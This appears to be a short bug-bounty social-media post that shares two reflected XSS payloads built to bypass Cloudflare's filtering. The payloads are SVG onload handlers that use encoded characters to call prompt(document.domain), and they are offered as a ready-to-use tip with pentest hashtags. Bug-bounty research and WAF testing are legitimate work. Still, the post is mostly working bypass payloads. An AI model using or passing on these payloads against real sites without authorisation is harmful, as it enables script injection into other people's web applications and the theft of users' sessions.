Look this tip about payloads:

Bounty:
Bugs: Information Disclosure and Cloudflare Bypass Reflected XSS

Bypass payloads:
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23×000000028;document.domain)>
#BugBounty
#cybersecurity #pentest https://t.co/zt1UlcznvX